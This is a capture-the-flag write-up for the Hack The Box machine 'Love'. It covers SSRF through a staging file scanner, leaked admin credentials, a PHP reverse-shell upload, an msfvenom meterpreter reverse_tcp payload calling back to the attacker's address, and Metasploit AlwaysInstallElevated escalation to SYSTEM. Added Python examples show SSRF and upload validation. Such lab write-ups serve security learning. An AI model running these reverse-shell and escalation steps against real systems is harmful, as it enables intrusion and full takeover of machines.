Hackthebox - Love

Summary

Love is an easy Windows box created by pwnmeow.
The initial foothold was finding credentials with a staging file scanner, using them to log in to the admin route of the voting system, and uploading a PHP shell that gives us a shell. After getting a shell, running winPEAS shows that AlwaysInstallElevated is enabled, which we use to get an Administrator shell.

Initial Enumeration

Let's start with an nmap scan.

# Nmap 7.91 scan initiated Sun May  2 09:32:59 2021 as: nmap -sC -sV -oN nmap/love 10.129.123.28
Nmap scan report for love.htb (10.129.123.28)
Host is up (0.16s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h41m30s, deviation: 4h02m30s, median: 21m29s
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-01T21:25:01-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-02T04:25:00
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 2 09:33:43 2021 -- 1 IP address (1 host up) scanned in 43.53 seconds

From this we see many interesting things, but let's start with the web services on 80 and 443. From the certificate's common name we find staging.love.htb.

Web (80 and 443)

Let's check the cert again in the browser for any other info.

We only see the same.

Let's check love.htb on both 80 and 443.

80

443

staging.love.htb

There we see a demo.

Seeing a URL field, I tried to curl myself and saw that I was getting a request.

So I tried to curl a reverse shell, but was unsuccessful.

Playing around with it to get anything out of it, I got nothing.

So I started gobuster on love.htb and staging.love.htb

and started looking at other things. SMB gave me nothing. Another interesting port for me was 5000; visiting it I got Forbidden (maybe it is only allowed from the internal network, localhost).

Let's go back to the file scanner

and try http://127.0.0.1:5000/, and bingo, we see a result and some credentials.

Trying those on SMB and WinRM doesn't get me anything.
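The staging file scanner fetched http://127.0.0.1:5000/ on the server's behalf, which is how the internal service and its credentials became reachable from outside. As an added example (not code from the writeup or from the scanner application; the function names are mine), a target check that a URL-fetching feature can run before it makes the request:

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(host):
    """Look up every address the hostname resolves to (real DNS)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_scan_target(url, resolver=resolve_host):
    """Return (ok, reason); ok is False when the scanner must not fetch url.

    Rejects non-http(s) schemes and any host that is, or resolves to, a
    loopback, private, link-local or otherwise non-public address, so a
    request for http://127.0.0.1:5000/ never reaches the internal service.
    """
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parsed.scheme!r} not allowed"
    host = parsed.hostname  # lower-cased, brackets stripped from IPv6 literals
    if not host:
        return False, "no host in URL"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "loopback hostname"
    try:
        addrs = {ipaddress.ip_address(host)}  # plain IP literal, no lookup
    except ValueError:
        # Not a plain literal: resolve it. Shorthand forms such as 127.1 or
        # 2130706433 land here too and are caught by the address checks below.
        try:
            addrs = {ipaddress.ip_address(a) for a in resolver(host)}
        except (socket.gaierror, ValueError) as exc:
            return False, f"could not resolve {host}: {exc}"
    for addr in addrs:
        # ::ffff:127.0.0.1 is a loopback address inside an IPv6 wrapper
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
            addr = addr.ipv4_mapped
        if not addr.is_global:
            return False, f"{host} maps to non-public address {addr}"
    return True, "ok"
```

The fetch that follows should connect to the address that was vetted rather than resolving the name a second time, otherwise a DNS answer that changes between the check and the request bypasses it.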

Checking the gobuster result we see

gobuster dir  -b 403,404 -w /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt  -u http://love.htb -x php -o love.gobuster
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://love.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/05/02 11:15:52 Starting gobuster in directory enumeration mode
===============================================================
/includes (Status: 301) [Size: 332] [--> http://love.htb/includes/]
/images (Status: 301) [Size: 330] [--> http://love.htb/images/]
/admin (Status: 301) [Size: 329] [--> http://love.htb/admin/]
/login.php (Status: 302) [Size: 0] [--> index.php]
/plugins (Status: 301) [Size: 331] [--> http://love.htb/plugins/]

We see a new route, /admin.

Using the creds we found, admin:@LoveIsInTheAir!!!!, we can get in.

Also checking the gobuster result we saw /images/; opening that we get an index of all images,

and we can also find the admin image in that folder.

Let's try to upload a PHP shell instead of an image and trigger it from images/shell.php (this is my thought process).

For the PHP reverse shell I chose to use shell.php.

Opening shell.php gave me a shell as love\phoebe.
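The profile-image upload accepted shell.php and stored it under a web-served directory where Apache executes PHP. As an added example (not code from the writeup or from the Voting System application; names are mine), the server-side checks that would have refused it: an extension allowlist, a magic-byte check against the declared type, and a server-chosen file name.

```python
import os
import secrets

# Magic bytes for the image types a profile-photo upload should accept.
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# PHP open tags, compared against the lower-cased body.
PHP_MARKERS = (b"<?php", b"<?=", b'<script language="php"')


def validate_image_upload(filename, data):
    """Return (accepted, reason) for an uploaded file.

    The extension must be on the allowlist, the leading bytes must match
    that type's signature, and a PHP open tag anywhere in the body is
    refused, so neither shell.php nor shell.php renamed to .png is stored.
    """
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension {ext!r} is not an allowed image type"
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        return False, "file content does not match the declared image type"
    lowered = data.lower()
    if any(marker in lowered for marker in PHP_MARKERS):
        return False, "embedded PHP tag"
    return True, "ok"


def stored_name(filename):
    """Server-chosen name: random stem plus the vetted extension, so the
    client's own file name never decides the stored path. Call only after
    validate_image_upload accepted the file."""
    ext = os.path.splitext(filename)[1].lower()
    return f"{secrets.token_hex(16)}{ext}"
```

Keeping the images directory non-executable (no PHP handler for it) or storing uploads outside the document root is the matching web-server control, so a check that is bypassed still does not give code execution.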

Privilege Escalation

Running winPEAS on the box shows that we have

AlwaysInstallElevated enabled

Looking at the HackTricks article, we see there are multiple ways to escalate with this.

I chose to use Metasploit to exploit this.

To do so I needed my shell to be a Meterpreter shell,

so I created a Meterpreter shell.exe using

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f exe -o shell.exe

and uploaded and ran it on the box,

and caught the shell in msfconsole

$ sudo msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > run
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.9:4444
[*] Sending stage (175174 bytes) to 10.129.123.83
[*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.129.123.83:63483) at 2021-05-02 12:28:28 +0530

After getting the session I used the module exploit/windows/local/always_install_elevated

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/always_install_elevated
set session 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set session 1
session => 1
msf6 exploit(windows/local/always_install_elevated) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/local/always_install_elevated) > run

This opens a new session as nt authority\system

and we get

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/love/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.